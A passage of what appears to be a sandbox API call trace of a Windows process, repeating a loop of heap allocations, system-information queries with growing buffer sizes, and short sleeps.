[0217.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.661] Sleep (dwMilliseconds=0x110) [0217.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.677] Sleep (dwMilliseconds=0x110) [0217.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.690] Sleep (dwMilliseconds=0x110) [0217.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.708] Sleep (dwMilliseconds=0x110) [0217.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.724] Sleep (dwMilliseconds=0x110) [0217.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.737] Sleep (dwMilliseconds=0x110) [0217.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.824] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.825] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.828] Sleep (dwMilliseconds=0x110) [0217.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.847] Sleep (dwMilliseconds=0x110) [0217.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.867] Sleep (dwMilliseconds=0x110) [0217.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.882] Sleep (dwMilliseconds=0x110) [0217.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.899] Sleep (dwMilliseconds=0x110) [0217.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.915] Sleep (dwMilliseconds=0x110) [0217.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.922] Sleep (dwMilliseconds=0x110) [0217.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.940] Sleep (dwMilliseconds=0x110) [0217.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, 